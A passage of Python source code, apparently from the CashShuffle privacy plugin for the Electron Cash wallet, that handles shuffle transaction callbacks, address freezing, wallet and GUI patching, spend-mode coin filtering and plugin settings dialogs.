window.wallet.set_label(txid, _make_label(window, tot, amt, chg, fee, scale))
Plugin._increment_shuffle_counter(window)
window.print_error("CashShuffle: found coin {} in tentative shuffle cache, applied label".format(utxo))
window.update_wallet()
else:
# hmm. this branch is very very unlikely.
window.print_error("CashShuffle: found coin {} in shuffle cache, but its tx is not a shuffle tx; label not applied".format(utxo))
break
else:
# This coin was spent in this tx, but it appears to not be the tx we anticipated.. Last player didn't broadcast and we spent it later (perhaps as a re-shuffle or other).
window.print_error("CashShuffle: removing spent coin {} from tentative shuffle cache, label not applied".format(utxo))
t.pop(utxo) # unconditionally remove this tentative coin from the dict since either way it's spent
return
def _got_tx_check_if_spent_shuffled_coin_and_freeze_used_address_etc(window, tx):
''' Freeze address after spending from a shuffled coin address for privacy (issue #100).
Also remove any shuffled coin spends from the _is_shuffled_cache. '''
inputs = tx.inputs()
addrs_to_freeze = set()
coins_to_purge_from_shuffle_cache = list()
coins_to_purge_from_reshuffles = set()
wallet = window.wallet
all_addresses = None
def is_mine(a):
''' This is faster than calling wallet.is_mine on *each* input
as that involves a lot of rebuilding of the addresses list for each call.
Also we use a set here which is faster than O(n) list lookup.
This matters on huge tx's with many inputs as a speedup.'''
nonlocal all_addresses
if all_addresses is None:
all_addresses = set(wallet.get_addresses())
return a in all_addresses
for inp in inputs:
addr = inp['address']
if isinstance(addr, Address) and is_mine(addr):
# This coin was ours, purge True/False results from the
# _is_shuffled_cache for this coin.
name = CoinUtils.get_name(inp)
coins_to_purge_from_shuffle_cache.append(name)
coins_to_purge_from_reshuffles.add(name)
if addr not in addrs_to_freeze and wallet.is_coin_shuffled(inp):
# We spent a shuffled coin belonging to us.
# Freeze that address to protect privacy.
addrs_to_freeze.add(addr)
if addrs_to_freeze:
change_addr_set = set(wallet.get_change_addresses())
addrs_to_freeze2 = addrs_to_freeze & change_addr_set # we *ONLY* freeze if change address. see #1291
if addrs_to_freeze2:
wallet.set_frozen_state(addrs_to_freeze2, True)
for addr in addrs_to_freeze2:
name = addr.to_storage_string()
if not wallet.labels.get(name): # only put a label in there if no label there already
wallet.set_label(name, _("Shuffled coin spent (frozen for privacy)"))
# the below is to prevent the "is_shuffled_cache" from growing forever which
# impacts performance and wastes memory. Since we were checking a seen TX
# anyway, might as well expire coins from the cache that were spent.
# remove_from_shufflecache acquires locks as it operates on the cache.
CoinUtils.remove_from_shufflecache(wallet, coins_to_purge_from_shuffle_cache)
# "forget" that these addresses were designated as shuffled addresses.
CoinUtils.remove_from_shuffled_address_cache(wallet, addrs_to_freeze)
wallet._reshuffles.difference_update(coins_to_purge_from_reshuffles)
def _got_tx(window, tx):
''' Generic callback to monitor tx's received for a wallet. Note that
if this is called the tx definitely is for this window/wallet. '''
if not hasattr(window, '_shuffle_patched_'):
# defensie programming in case this signal arrives late
# just as the user was disabling cash shuffle
# (signal arrives via QueuedConnection which is why this check is necessary)
return
_got_tx_check_tentative_shuffles(window, tx) # check for workaround to bug#70
_got_tx_check_if_spent_shuffled_coin_and_freeze_used_address_etc(window, tx) # Feature #100
# Note at this point the is_shuffled cache has had entries for inputs in
# the tx above removed. If you want to add checks to this function that
# involve the _is_shuffled_cache, do it above before the
# '_got_tx_check_if_spent_shuffled_coin_and_freeze_used_address_etc' call.
class MsgForwarder(QObject):
''' Forwards messages from BackgroundShufflingThread to the GUI thread using
Qt signal magic. See function update_coin_status above. '''
gotMessage = pyqtSignal(str, str)
def __init__(self, window):
super().__init__(None)
self.window = window
self.gotMessage.connect(self.gotMsgSlot)
def send(self, msg, sender):
self.gotMessage.emit(msg, sender)
def gotMsgSlot(self, msg, sender):
update_coin_status(self.window, sender, msg)
def disconnectAll(self):
try:
self.gotMessage.disconnect()
except:
pass
def start_background_shuffling(window, network_settings, period = 10.0, password = None, timeout = 60.0):
logger = MsgForwarder(window)
window.background_process = BackgroundShufflingThread(window,
window.wallet,
network_settings,
logger = logger,
period = period,
password = password,
timeout = timeout)
window.background_process.start()
def monkey_patches_apply(window):
def patch_window(window):
if getattr(window, '_shuffle_patched_', None):
return
window.background_process = None
window.send_tab_shuffle_extra = SendTabExtra(window)
window._shuffle_tentative = dict()
class Sigs(QObject):
tx = pyqtSignal(QObject, object)
window._shuffle_sigs = sigs = Sigs(window)
sigs.tx.connect(_got_tx)
window._shuffle_network_callback = lambda event, *args: network_callback(window, event, *args)
if window.network:
window.network.register_callback(window._shuffle_network_callback, ['new_transaction'])
window._shuffle_patched_ = True
window.force_use_single_change_addr = _("CashShuffle is enabled: change address logic will be handled by CashShuffle (to preserve privacy).")
print_error("[shuffle] Patched window")
def patch_utxo_list(utxo_list):
if getattr(utxo_list, '_shuffle_patched_', None):
return
header = utxo_list.headerItem()
header_labels = [header.text(i) for i in range(header.columnCount())]
header_labels.append(_("Shuffle status"))
utxo_list.update_headers(header_labels)
utxo_list.in_progress = dict()
utxo_list._shuffle_patched_ = True
print_error("[shuffle] Patched utxo_list")
def patch_wallet(wallet):
if getattr(wallet, '_shuffle_patched_', None):
return
wallet.is_coin_shuffled = lambda coin, txs=None: CoinUtils.is_coin_shuffled(wallet, coin, txs)
wallet.get_shuffled_and_unshuffled_coins = lambda *args, **kwargs: CoinUtils.get_shuffled_and_unshuffled_coins(wallet, *args, **kwargs)
wallet.cashshuffle_get_new_change_address = lambda for_shufflethread=False: CoinUtils.get_new_change_address_safe(wallet, for_shufflethread=for_shufflethread)
wallet._is_shuffled_cache = dict()
wallet._shuffled_address_cache = set()
wallet._addresses_cashshuffle_reserved = set()
wallet._reshuffles = set()
wallet._last_change = None
CoinUtils.load_shuffle_change_shared_with_others(wallet) # sets wallet._shuffle_change_shared_with_others
# Paranoia -- force wallet into this single change address mode in case
# other code (plugins, etc) generate tx's. We don't want tx generation
# code to clobber our shuffle tx output addresses.
change_addr_policy_1 = (bool(wallet.storage.get('use_change')), bool(wallet.storage.get('multiple_change')))
change_addr_policy_2 = (bool(wallet.use_change), bool(wallet.multiple_change))
desired_policy = (True, False)
if any(policy != desired_policy for policy in (change_addr_policy_1, change_addr_policy_2)):
wallet.use_change, wallet.multiple_change = desired_policy
wallet.storage.put('use_change', desired_policy[0])
wallet.storage.put('multiple_change', desired_policy[1])
wallet.print_error("CashShuffle forced change address policy to: use_change={}, multiple_change={}"
.format(desired_policy[0], desired_policy[1]))
# More paranoia -- in case app crashed, unfreeze coins frozen by last
# app run.
CoinUtils.unfreeze_frozen_by_shuffling(wallet)
wallet._shuffle_patched_ = True
print_error("[shuffle] Patched wallet")
patch_wallet(window.wallet)
patch_utxo_list(window.utxo_list)
patch_window(window)
def monkey_patches_remove(window):
def restore_window(window):
if not getattr(window, '_shuffle_patched_', None):
return
if window.network:
window.network.unregister_callback(window._shuffle_network_callback)
delattr(window, '_shuffle_network_callback')
try: window._shuffle_sigs.tx.disconnect()
except TypeError: pass
window._shuffle_sigs.deleteLater()
delattr(window, "_shuffle_sigs")
delattr(window, '_shuffle_tentative')
window.send_tab_shuffle_extra.setParent(None); window.send_tab_shuffle_extra.deleteLater();
delattr(window, 'send_tab_shuffle_extra')
delattr(window, 'background_process')
delattr(window, '_shuffle_patched_')
window.force_use_single_change_addr = None
print_error("[shuffle] Unpatched window")
# Note that at this point an additional monkey patch: 'window.__disabled_sendtab_extra__' may stick around until the plugin is unloaded altogether
def restore_utxo_list(utxo_list):
if not getattr(utxo_list, '_shuffle_patched_', None):
return
header = utxo_list.headerItem()
header_labels = [header.text(i) for i in range(header.columnCount())]
del header_labels[-1]
utxo_list.update_headers(header_labels)
utxo_list.in_progress = None
delattr(window.utxo_list, "in_progress")
delattr(window.utxo_list, '_shuffle_patched_')
print_error("[shuffle] Unpatched utxo_list")
def restore_wallet(wallet):
if not getattr(wallet, '_shuffle_patched_', None):
return
delattr(wallet, '_addresses_cashshuffle_reserved')
delattr(wallet, 'cashshuffle_get_new_change_address')
delattr(wallet, "is_coin_shuffled")
delattr(wallet, "get_shuffled_and_unshuffled_coins")
delattr(wallet, "_is_shuffled_cache")
delattr(wallet, "_shuffled_address_cache")
delattr(wallet, '_shuffle_patched_')
delattr(wallet, "_last_change")
delattr(wallet, "_reshuffles")
CoinUtils.store_shuffle_change_shared_with_others(wallet) # save _shuffle_change_shared_with_others to storage -- note this doesn't call storage.write() for performance reasons.
delattr(wallet, '_shuffle_change_shared_with_others')
CoinUtils.unfreeze_frozen_by_shuffling(wallet)
print_error("[shuffle] Unpatched wallet")
restore_window(window)
restore_utxo_list(window.utxo_list)
restore_wallet(window.wallet)
def _elide(x, maxlen=30, startlen=8):
''' Useful for eliding GUI text with an ellipsis ... in the middle '''
if len(x) > maxlen and startlen + 3 < maxlen:
return x[:startlen] + "..." + x[-(maxlen-startlen-3):]
return x
class Plugin(BasePlugin):
instance = None # The extant instance singleton, if any. Variable is cleared on plugin stop.
gui = None # The "gui object" singleton (ElectrumGui) -- a useful refrence to keep around.
network_dialog = None # The NetworkDialog window singleton (managed by the ElectrumGui singleton).
def fullname(self):
return 'CashShuffle'
def description(self):
return _("CashShuffle Protocol")
def is_available(self):
return True
def __init__(self, parent, config, name):
BasePlugin.__init__(self, parent, config, name)
self.windows = []
self.disabled_windows = [] # this is to manage the "cashshuffle disabled" xtra gui element in the send tab
self._hide_history_txs = False
self.initted = False
def is_defunct(self):
return Plugin.instance is not self
@hook
def init_qt(self, gui):
if self.initted:
return
self.print_error("Initializing...")
Plugin.instance = self
Plugin.gui = gui
self._delete_old_keys(gui.config)
if Plugin.network_dialog != gui.nd:
Plugin.network_dialog = gui.nd # each time we are stopped, our module gets re-imported and we lose globals... so try and recapture this singleton
ct = 0
for window in gui.windows:
self.on_new_window(window)
ct += 1
self.on_network_dialog(Plugin.network_dialog) # If we have a network dialgog, add self to network dialog
self.initted = True
self._hide_history_txs = bool(gui.config.get(ConfKeys.Global.HIDE_TXS_FROM_HISTORY, False))
self.print_error("Initialized (had {} extant windows).".format(ct))
self._hide_history_txs_check()
@hook
def on_network_dialog(self, nd):
Plugin.network_dialog = nd
if not nd: return
self.print_error("OnNetworkDialog", str(nd))
if not hasattr(nd, "__shuffle_settings__") or not nd.__shuffle_settings__:
nd.__shuffle_settings__ = st = SettingsTab(parent=nd.nlayout.tabs, config=nd.nlayout.config)
nd.nlayout.tabs.addTab(st, _("CashShuffle"))
st.applyChanges.connect(Plugin.try_to_apply_network_dialog_settings)
elif nd.__shuffle_settings__:
# they may have a fake view if they didn't apply the last settings, refresh the view
st = nd.__shuffle_settings__
st.refreshFromSettings()
def show_cashshuffle_tab_in_network_dialog(self, window):
window.gui_object.show_network_dialog(window)
nd = Plugin.network_dialog
if nd and getattr(nd, '__shuffle_settings__', None):
st = nd.__shuffle_settings__
nd.nlayout.tabs.setCurrentWidget(st)
nd.activateWindow()
return True
return False
def del_network_dialog_tab(self):
# delete the shuffle settings widget
if Plugin.network_dialog and hasattr(Plugin.network_dialog, '__shuffle_settings__'):
nd = Plugin.network_dialog
st = Plugin.network_dialog.__shuffle_settings__
if st:
idx = nd.nlayout.tabs.indexOf(st)
if idx > -1:
if nd.nlayout.tabs.currentIndex() == idx:
nd.nlayout.tabs.setCurrentIndex(0)
nd.nlayout.tabs.removeTab(idx)
st.kill()
st.setParent(None)
st.deleteLater() # need to call this otherwise it sticks around :/
st = None
Plugin.network_dialog.__shuffle_settings__ = None
self.print_error("Removed CashShuffle network settings tab")
def window_has_cashshuffle(self, window):
return window in self.windows
def window_wants_cashshuffle(self, window):
return window.wallet.storage.get(ConfKeys.PerWallet.ENABLED, False)
def window_set_wants_cashshuffle(self, window, b):
window.wallet.storage.put(ConfKeys.PerWallet.ENABLED, bool(b))
def window_set_cashshuffle(self, window, b):
if not b and self.window_has_cashshuffle(window):
self._disable_for_window(window)
elif b and not self.window_has_cashshuffle(window):
self._enable_for_window(window)
self.window_set_wants_cashshuffle(window, b)
def _window_set_disabled_extra(self, window):
self._window_clear_disabled_extra(window)
window.__disabled_sendtab_extra__ = SendTabExtraDisabled(window)
def _window_clear_disabled_extra(self, window):
extra = getattr(window, "__disabled_sendtab_extra__", None)
if extra:
extra.setParent(None) # python will gc this badboy
delattr(window, "__disabled_sendtab_extra__")
del extra # hopefully object refct goes immediately to 0 and this widget dies quickly.
return True
@hook
def on_new_window(self, window):
if not window.is_wallet_cashshuffle_compatible():
# wallet is watching-only, multisig, or hardware so.. mark it permanently for no cashshuffle
self.window_set_cashshuffle(window, False)
window.update_status() # this has the side-effect of refreshing the cash shuffle status bar button's context menu (which has actions even for disabled/incompatible windows)
return
if window.wallet and not self.window_has_cashshuffle(window):
if self.window_wants_cashshuffle(window):
self._enable_for_window(window) or self._window_add_to_disabled(window)
else:
self._window_add_to_disabled(window)
def _enable_for_window(self, window):
name = window.wallet.basename()
self.print_error("Window '{}' registered, performing window-specific startup code".format(name))
if window.gui_object.warn_if_no_secp(
parent=window,
message=_("CashShuffle requires libsecp; cannot enable shuffling for this wallet."),
icon=QMessageBox.Critical):
self.print_error("Refusing to enable CashShuffle for window '{}' because no libsecp :(".format(name))
return
if self.is_defunct(): return # we need to do this because presentation of above dialog box may mean user had the opportunity to close the plugin in another window
cached_password = window.gui_object.get_cached_password(window.wallet)
password = None
while window.wallet.has_password():
msg = _("CashShuffle requires access to '{}'.").format(name) + "\n" + _('Please enter your password')
if cached_password:
password = cached_password
cached_password = None
else:
pwdlg = PasswordDialog(parent=window.top_level_window(), msg=msg)
password = pwdlg.run()
if self.is_defunct(): return # we need to do this because presentation of above dialog box may mean user had the opportunity to close the plugin in another window
if password is None:
# User cancelled password input
if not self.warn_if_shuffle_disable_not_ok(window, msg=_('CashShuffle will now be <i>disabled</i> for a wallet which has previously had it <b>enabled</b>. Are you sure?')):
# User was warned and opted to try again to enable
continue
self.window_set_cashshuffle(window, False)
window.show_error(_("CashShuffle password prompt canceled; disabling for this wallet."), parent=window)
return
try:
window.wallet.check_password(password)
break
except Exception as e:
window.show_error(str(e), parent=window)
if self.is_defunct(): return # we need to do this because presentation of above dialog box may mean user had the opportunity to close the plugin in another window
continue
network_settings = Plugin.get_network_settings(window.config)
if not network_settings:
network_settings = self.settings_dialog(window, msg=_("Please choose a CashShuffle server"), restart_ask = False)
if self.is_defunct(): return # we need to do this because presentation of above dialog box may mean user had the opportunity to close the plugin in another window
if not network_settings:
self.window_set_cashshuffle(window, False)
window.show_error(_("Can't get network, disabling CashShuffle."), parent=window)
return
self._delete_old_keys(window.wallet)
self._window_remove_from_disabled(window)
network_settings = copy.deepcopy(network_settings)
network_settings['host'] = network_settings.pop('server')
monkey_patches_apply(window)
self.windows.append(window)
self._increment_session_counter(window)
window.update_status()
window.utxo_list.update()
start_background_shuffling(window, network_settings, password=password)
return True
@hook
def utxo_list_item_setup(self, utxo_list, item, x, name):
my_custom_item_setup(utxo_list, item, x, name)
@hook
def utxo_list_context_menu_setup(self, utxo_list, menu, selected):
window = utxo_list.parent
if window in self.windows:
my_custom_utxo_context_menu_setup(window, utxo_list, menu, selected)
@hook
def history_list_filter(self, history_list, h_item, label):
if self._hide_history_txs:
return bool(label.startswith("Shuffle ") # this string is not translated for performance reasons. _make_label also does not translate this string.
and ( any( x for x in BackgroundShufflingThread.SCALE_ARROWS
if x in label )
or BackgroundShufflingThread.SCALE_ARROW_UNKNOWN in label
)
)
return None
@hook
def history_list_context_menu_setup(self, history_list, menu, item, tx_hash):
# NB: We unconditionally create this menu if the plugin is loaded because
# it's possible for any wallet, even a watching-only wallet to have
# shuffle tx's with the correct labels (if the user uses labelsync or
# has imported labels).
menu.addSeparator()
def action_callback():
self._hide_history_txs = not self._hide_history_txs
Plugin.gui.config.set_key(ConfKeys.Global.HIDE_TXS_FROM_HISTORY, self._hide_history_txs, save=True)
action.setChecked(self._hide_history_txs)
if self._hide_history_txs:
tip = _("Shuffle transactions are now hidden")
else:
tip = _("Shuffle transactions are now shown")
QToolTip.showText(QCursor.pos(), tip, history_list)
history_list.update() # unconditionally update this history list as it may be embedded in the address_detail window and not a global history list..
for w in Plugin.gui.windows:
# Need to update all the other open windows.
# Note: We still miss any other open windows' address-detail
# history lists with this.. but that's ok as most of the
# time it won't be noticed by people and actually
# finding all those windows would just make this code
# less maintainable.
if history_list is not w.history_list: # check if not already updated above
w.history_list.update()
action = menu.addAction(_("Hide shuffle transactions"), action_callback)
action.setCheckable(True)
action.setChecked(self._hide_history_txs)
def on_close(self):
''' This is called on plugin unload/disable '''
self.del_network_dialog_tab()
PoolsWinMgr.killInstance()
for window in self.windows.copy():
self.on_close_window(window)
for window in self.disabled_windows.copy():
self.on_close_window(window)
for window in self.gui.windows:
# lastly, we do this for ALL the extant wallet windows because all
# of their CashShuffle context menus attached to the cashshuffle
# status button need updating when the plugin is exited. Note
# that there may be windows in this set (incompatible windows)
# that aren't in either of the above 2 sets of windows.
window.update_status()
self.initted = False
Plugin.instance = None
self.print_error("Plugin closed")
assert len(self.windows) == 0 and len(self.disabled_windows) == 0, (self.windows, self.disabled_windows)
self._hide_history_txs_check()
def _hide_history_txs_check(self):
# Handle possibility that now that plugin is closed or opened, shuffle tx's are hidden or not hidden. hide/unhide them
if self._hide_history_txs and Plugin.gui:
def refresh_history_lists(gui):
for w in gui.windows:
w.history_list.update()
QTimer.singleShot(250, lambda: refresh_history_lists(Plugin.gui))
@hook
def on_close_window(self, window):
def didRemove(window):
self.print_error("Window '{}' removed".format(window.wallet.basename()))
if self._window_remove_from_disabled(window):
didRemove(window)
return
if self._disable_for_window(window, add_to_disabled = False):
didRemove(window)
return
def _disable_for_window(self, window, add_to_disabled = True):
if window not in self.windows:
return
name = window.wallet.basename()
if window.background_process:
self.print_error("Joining background_process...")
window.background_process.join()
window.background_process.logger.disconnectAll(); window.background_process.logger.deleteLater()
window.background_process = None
self.print_error("Window '{}' closed, ended shuffling for its wallet".format(name))
self.windows.remove(window)
monkey_patches_remove(window)
window.utxo_list.update()
window.update_status()
self.print_error("Window '{}' disabled".format(name))
if add_to_disabled:
self._window_add_to_disabled(window)
else:
self._window_remove_from_disabled(window)
return True
def _window_add_to_disabled(self, window):
if window not in self.disabled_windows:
self._window_set_disabled_extra(window)
self.disabled_windows.append(window)
return True
def _window_remove_from_disabled(self, window):
self._window_clear_disabled_extra(window)
if window in self.disabled_windows:
self.disabled_windows.remove(window)
return True
@hook
def on_new_password(self, window, old, new):
if getattr(window, 'background_process', None):
self.print_error("Got new password for wallet {} informing background process...".format(window.wallet.basename() if window.wallet else 'UNKNOWN'))
window.background_process.set_password(new)
@hook
def on_spend_coins(self, window, coins):
if (not coins or window not in self.windows
# the coin may not be "mine" if doing private key -> sweep
# in that case, just abort this as it doesn't matter what
# mode the send tab is in
or (window.tx_external_keypairs
and not window.wallet.is_mine(coins[0]['address']))):
return
extra = window.send_tab_shuffle_extra
spend_mode = extra.spendingMode()
is_shuffled = CoinUtils.is_coin_shuffled(window.wallet, coins[0]) # check coins[0]
if spend_mode == extra.SpendingModeShuffled and not is_shuffled:
# Coin is not shuffled, spend mode is Shuffled, force send tab to
# coin's mode
extra.setSpendingMode(extra.SpendingModeUnshuffled)
elif spend_mode == extra.SpendingModeUnshuffled and is_shuffled:
# Coin is shuffled, spend mode is UnShuffled, force send tab to
# coin's mode
extra.setSpendingMode(extra.SpendingModeShuffled)
@hook
def spendable_coin_filter(self, window, coins):
if not coins or window not in self.windows:
return
extra = window.send_tab_shuffle_extra
spend_mode = extra.spendingMode()
external_coin_addresses = set() # this is only ever used if they are doing a sweep. in which case we always allow the coins involved in the sweep
for pubkey in window.tx_external_keypairs:
a = Address.from_pubkey(pubkey)
external_coin_addresses.add(a)
if spend_mode == extra.SpendingModeShuffled:
# in Cash-Shuffle mode + shuffled spending we can ONLY spend shuffled coins + unshuffled living on a shuffled coin address
shuf_adrs_seen = set()
shuf_coins_seen = set()
for coin in coins.copy():
if coin['address'] in external_coin_addresses:
# completely bypass this filter for external keypair dict
# which is only used for sweep dialog in send tab
continue
is_shuf_adr = CoinUtils.is_shuffled_address(window.wallet, coin['address'])
if is_shuf_adr:
shuf_adrs_seen.add(coin['address'])
if (not CoinUtils.is_coin_shuffled(window.wallet, coin)
and not is_shuf_adr): # we allow coins sitting on a shuffled address to be "spent as shuffled"
coins.remove(coin)
else:
shuf_coins_seen.add(CoinUtils.get_name(coin))
# NEW! Force co-spending of other coins sitting on a shuffled address (Fix #3)
for adr in shuf_adrs_seen:
adr_coins = window.wallet.get_addr_utxo(adr)
for name, adr_coin in adr_coins.items():
if name not in shuf_coins_seen and not adr_coin['is_frozen_coin']:
coins.append(adr_coin)
shuf_coins_seen.add(name)
elif spend_mode == extra.SpendingModeUnshuffled:
# in Cash-Shuffle mode + unshuffled spending we can ONLY spend unshuffled coins (not sitting on a shuffled address)
for coin in coins.copy():
if ((CoinUtils.is_coin_shuffled(window.wallet, coin)
or is_coin_busy_shuffling(window, coin)
or CoinUtils.is_shuffled_address(window.wallet, coin['address']))
and coin['address'] not in external_coin_addresses):
coins.remove(coin)
@hook
def balance_label_extra(self, window):
if window not in self.windows:
return
shuf, unshuf, uprog, usas = CoinUtils.get_shuffled_and_unshuffled_coin_totals(window.wallet)
totShuf, nShuf = shuf
# TODO: handle usas separately?
totShuf += usas[0]
nShuf += usas[1]
window.send_tab_shuffle_extra.refresh(shuf, unshuf, uprog, usas)
if nShuf:
return (_('Shuffled: {} {} in {} Coin'),
_('Shuffled: {} {} in {} Coins'))[0 if nShuf == 1 else 1].format(window.format_amount(totShuf).strip(), window.base_unit(), nShuf)
return None
@hook
def not_enough_funds_extra(self, window):
if window not in self.windows:
return
shuf, unshuf, uprog, usas = CoinUtils.get_shuffled_and_unshuffled_coin_totals(window.wallet)
totShuf, nShuf, totUnshuf, nUnshuf, totInProg, nInProg = *shuf, *unshuf, *uprog
# TODO: handle usas separately?
totShuf += usas[0]
nShuf += usas[1]
extra = window.send_tab_shuffle_extra
extra.refresh(shuf, unshuf, uprog)
spend_mode = extra.spendingMode()
rets = []
if spend_mode == extra.SpendingModeShuffled:
if totUnshuf:
rets += [_("{} {} are unshuffled").format(window.format_amount(totUnshuf).strip(), window.base_unit())]
elif spend_mode == extra.SpendingModeUnshuffled:
if totShuf:
rets += [_("{} {} are shuffled").format(window.format_amount(totShuf).strip(), window.base_unit())]
if totInProg:
rets += [_("{} {} are busy shuffling").format(window.format_amount(totInProg).strip(), window.base_unit())]
return ') ('.join(rets) or None
@hook
def get_change_addrs(self, wallet):
for window in self.windows:
if wallet == window.wallet:
change_addrs = [wallet.cashshuffle_get_new_change_address()]
wallet.print_error("CashShuffle: reserving change address",change_addrs[0].to_ui_string())
return change_addrs
@hook
def do_clear(self, w):
for window in self.windows:
if w is window:
extra = getattr(w, 'send_tab_shuffle_extra', None)
if extra:
extra.do_clear()
return
def restart_all(self):
for window in self.windows:
bp = window.background_process
if bp:
password = bp.get_password()
network_settings = Plugin.get_network_settings(window.config)
if network_settings:
bp.join()
# kill the extant console logger as its existence can cause subtle bugs
bp.logger.disconnectAll(); bp.logger.deleteLater(); bp.logger = None
network_settings['host'] = network_settings.pop('server')
window.background_process = None; del bp
start_background_shuffling(window, network_settings, password=password)
window.print_error("CashShuffle restarted for wallet")
nd = Plugin.network_dialog
# force network settings tab to also refresh itself on restart to keep it in synch with other possible settings dialogs
if nd:
st = getattr(nd, "__shuffle_settings__", None)
if st: st.refreshFromSettings()
else:
window.print_error("ERROR: could not load network settings, FIXME!")
else:
window.print_error("WARNING: Window lacks a background_process, FIXME!")
def view_pools(self, window):
assert isinstance(window, ElectrumWindow), "view_pools must be passed an ElectrumWindow object! FIXME!"
settings = __class__.get_and_validate_network_settings(window.config)
if settings:
sdict = settings.copy()
sdict['name'] = "{}:{}".format(sdict['server'], sdict['info'])
PoolsWinMgr.show(sdict, settings, window.config, parent_window=window, modal=False)
else:
# this should not normally be reachable in the UI, hence why we don't i18n the error string.
window.show_error("CashShuffle is not properly set up -- no server defined! Please select a server from the settings.")
def settings_dialog(self, window, msg=None, restart_ask = True):
def window_parent(w):
# this is needed because WindowModalDialog overrides window.parent
if callable(w.parent): return w.parent()
return w.parent
while not isinstance(window, ElectrumWindow) and window and window_parent(window):
# MacOS fixups -- we can get into a situation where we are created without the ElectrumWindow being an immediate parent or grandparent
window = window_parent(window)
assert window and isinstance(window, ElectrumWindow)
d = SettingsDialog(title=_("CashShuffle Settings"), config=window.config, message=msg)
try:
server_ok = False
ns = None
while not server_ok:
if not d.exec_():
return
else:
ns = d.get_form()
server_ok = d.serverOk
if not server_ok:
server_ok = Plugin.show_bad_server_box()
if ns:
Plugin.save_network_settings(window.config, ns)
if restart_ask:
window.restart_cashshuffle(msg = _("CashShuffle must be restarted for the server change to take effect."))
return ns
finally:
d.deleteLater()
del d
@staticmethod
def show_bad_server_box():
return bool(QMessageBox.critical(None, _("Error"), _("Unable to connect to the specified server."), QMessageBox.Retry|QMessageBox.Ignore, QMessageBox.Retry) == QMessageBox.Ignore)
@staticmethod
def try_to_apply_network_dialog_settings(settings_tab):
ns = settings_tab.get_form()
if ns and (settings_tab.serverOk or Plugin.show_bad_server_box()):
Plugin.save_network_settings(settings_tab.config, ns) # save settings first.
gui = Plugin.gui
instance = Plugin.instance
window = None
# Next, try and get a wallet window to query user for plugin restart. If no window found, that's ok. Restart won't be necessary. :)
if instance and instance.windows:
# first try and get a window that actually has cashshuffle running, as that's only polite
window = instance.windows[-1]
elif instance and instance.disabled_windows:
# ok, no enabled windows -- next, get a window that is cashshuffle compatible, if any exist
window = instance.disabled_windows[-1]
elif gui and gui.windows:
# If that fails, get any old window...
window = gui.windows[-1]
# NB: if no window at this point, settings will take effect next time CashShuffle is enabled for a window
if window:
# window will raise itself.
window.restart_cashshuffle(msg = _("CashShuffle must be restarted for the server change to take effect."),
parent = Plugin.network_dialog)
@staticmethod
def save_network_settings(config, network_settings):
ns = copy.deepcopy(network_settings)
print_error("Saving network settings: {}".format(ns))
config.set_key(ConfKeys.Global.SERVER, ns)
@staticmethod
def get_network_settings(config):
return copy.deepcopy(config.get(ConfKeys.Global.SERVER, None))
@staticmethod
def get_and_validate_network_settings(config):
selected = dict()
try:
# try and pre-populate from config
current = __class__.get_network_settings(config)
dummy = (current["server"], current["info"], current["ssl"]); del dummy;
selected = current
except (KeyError, TypeError):
pass
return selected
def settings_widget(self, window):
weakMeth = Weak(self.settings_dialog)
weakWindow = Weak(window)
return EnterButton(_('Settings'), lambda: weakMeth(weakWindow))
def requires_settings(self):
return True
def _delete_old_keys(self, config_or_wallet):
getter, setter, defuncts, thing = None, None, tuple(), None
if isinstance(config_or_wallet, SimpleConfig):
config = config_or_wallet
getter = lambda k: config.get(k)
setter = lambda k: config.set_key(k, None, save=True)
defuncts = ConfKeys.Global.DEFUNCT
thing = "config"
elif isinstance(config_or_wallet, Abstract_Wallet):
storage = config_or_wallet.storage
getter = lambda k: storage.get(k)
setter = lambda k: storage.put(k, None)
defuncts = ConfKeys.PerWallet.DEFUNCT
thing = "wallet.storage for {}".format(config_or_wallet.basename())
if thing:
ct = 0
for k in defuncts:
if getter(k) is not None:
ct += 1
setter(k)
if ct:
self.print_error("Found and removed {} deprecated keys from {}".format(ct, thing))
# counters: shuffle counter and session counter
@classmethod
def _increment_generic_counter(cls, window, key):
window.wallet.storage.put(key, cls._get_generic_counter(window, key) + 1)
@staticmethod
def _get_generic_counter(window, key):
try:
ctr = int(window.wallet.storage.get(key, 0))
except (ValueError, TypeError): # paranoia
# stored value must have not been an int. :(
ctr = 0
return ctr
@classmethod
def _increment_session_counter(cls, window):
cls._increment_generic_counter(window, ConfKeys.PerWallet.SESSION_COUNTER)
@classmethod
def _get_session_counter(cls, window):
return cls._get_generic_counter(window, ConfKeys.PerWallet.SESSION_COUNTER)
@classmethod
def _increment_shuffle_counter(cls, window):
cls._increment_generic_counter(window, ConfKeys.PerWallet.SHUFFLE_COUNTER)
@classmethod
def _get_shuffle_counter(cls, window):
return cls._get_generic_counter(window, ConfKeys.PerWallet.SHUFFLE_COUNTER)
# /counters
def warn_if_shuffle_disable_not_ok(self, window, *, msg=None):
'''
Determine if disabling (or not re-enabling in the case of a pw dialog
cancel) of cash shuffle is ok for this wallet.
This method may block the GUI with a local modal dialog asking the user
if they are sure.
In the future, we may also put code to say "shuffles pending, please
wait..." in a cancellable progress-type dialog.
Returns True if calling code should proceed with disable action.
'''
# Note -- window may not necessarily be shuffle patched as this
# may be called from the password dialog
noprompt = window.wallet.storage.get(ConfKeys.PerWallet.DISABLE_NAGGER_NOPROMPT, False)
if not noprompt and type(self)._get_session_counter(window) > 0:
if msg is None:
msg = _('You are now <i>disabling</i> CashShuffle for this wallet. Are you sure?')
ans, chk = window.question(
msg=msg,
informative_text=_('Spending and linking coins with CashShuffle disabled may compromise your privacy for both shuffled and unshuffled coins in this wallet.'),
title=_("Privacy Warning"), rich_text=True,
checkbox_text=_("Never ask for this wallet"), checkbox_ischecked=noprompt,
)
if chk:
window.wallet.storage.put(ConfKeys.PerWallet.DISABLE_NAGGER_NOPROMPT, bool(chk))
return bool(ans)
return True
class SendTabExtraDisabled(QFrame, PrintError):
''' Implements a Widget that appears in the main_window 'send tab' to inform the user CashShuffle was disabled for this wallet '''
def __init__(self, window):
self.send_tab = window.send_tab
self.send_grid = window.send_grid
self.wallet = window.wallet
self.window = window
super().__init__(window.send_tab)
self.send_grid.addWidget(self, 0, 0, 1, self.send_grid.columnCount()) # just our luck. row 0 is free!
self.setup()
def setup(self):
self.setFrameStyle(QFrame.StyledPanel|QFrame.Sunken)
l = QGridLayout(self)
l.setVerticalSpacing(6)
l.setHorizontalSpacing(30)
l.setContentsMargins(6, 6, 6, 6)
self.txt = "<big><b>{}</b></big> {}".format(_("CashShuffle Disabled"), _("Your shuffled and unshuffled coins can be mixed and spent together."))
